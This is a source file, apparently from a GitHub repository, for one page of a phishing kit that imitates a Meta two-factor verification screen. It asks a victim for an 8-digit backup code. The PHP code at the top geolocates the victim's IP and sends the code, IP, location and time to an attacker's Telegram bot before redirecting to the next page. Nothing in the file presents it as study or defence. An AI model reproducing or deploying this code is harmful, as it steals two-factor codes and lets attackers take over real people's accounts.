-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy path5.php
115 lines (95 loc) · 3.13 KB
/
5.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
<?php
error_reporting(0);
session_start();
if($_POST) {
$fore_user=$_SESSION["fore_user"];
$forecode=$_POST["forecode"];
$ip = $_SERVER["REMOTE_ADDR"];
$konum = file_get_contents("http://ip-api.com/xml/" . $ip);
$cek = new SimpleXMLElement($konum);
$ulke = $cek->country;
$sehir = $cek->city;
$site = $_SERVER["SERVER_NAME"];
date_default_timezone_set('Europe/Istanbul');
$cur_time = date("d-m-Y H:i:s");
require_once("admin/tg.php");
$data = [
'text' => '
'.$forecode.' SMS Kodu
kod : '.$forecode.'
İp : '.$ip.'
Konum : '.$ulke.' / '.$sehir.'
Tarih : '.$cur_time.'
@WebServicesx
',
'chat_id' =>"$chatid"
];
file_get_contents("https://api.telegram.org/bot$token/sendMessage?" . http_build_query($data) );
header("Location:6.php");
}
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
<link rel="stylesheet" href="https://pro.fontawesome.com/releases/v5.10.0/css/all.css" integrity="sha384-AYmEC3Yw5cVb3ZcuHtOA93w35dYTsvhLPVnYs9eStHfGJvOvKxVfELGroGkvsg+p" crossorigin="anonymous"/>
<link rel="stylesheet" href="css/style.css">
<title>-</title>
</head>
<body> <center>
</center>
<div class="forebaby">
<div class="yazi">
<br>
<br>
<br>
<img width="150" src="imgs/e.svg" alt="">
<br><br><br>
<p>Dear <b>@<?php $fore_user = $_SESSION["fore_user"];
echo $fore_user; ?>,<img width="20" src="imgs/tik.png" alt=""> </b> <br>
Enter 1 of the 8-digit backup codes for two-factor identity protection.</p>
<form method="post" autocomplete="off">
<center>
<input minlength="6" maxlength="8" required type="number" class="inputs" name="forecode" placeholder="8-digit backup code">
</center>
<button id="bttn" type="submit" class="btn2" >Login</button>
</form> <br>
<br>
</form>
</div>
</div> <br>
<center>
<div class="alt"><br>
<img width="150" src="imgs/ehe.png" alt="">
<br><br>
<p>For Meta Support and Complete message response please contact us best company and most robust Meta Verification Company</p>
<br><br>
</div>
</center>
<div class="enalt"> <br><br>
<div class="enaltig">
</div>
<div class="linksx">
<a href="#">Community Standarts</a> |
<a href="#">Data Policy</a> <br><br>
<a href="#">Terms</a>
|
<a href="#">Cookie Policy</a>
</div>
<br><hr color="#E0E0E0" size="0.1px" width="90%">
<br>
<div class="dil">
<p>Language English (US)</p>
</div>
<br>
</div>
<script src="jquery-3.6.0.js" ></script>
<script>
$( "form" ).submit(function( event ) {
$( "#bttn" ).html("<i id='loader' class='fa fa-spinner fa-spin'></i>");
});
</script>
</body>
</html>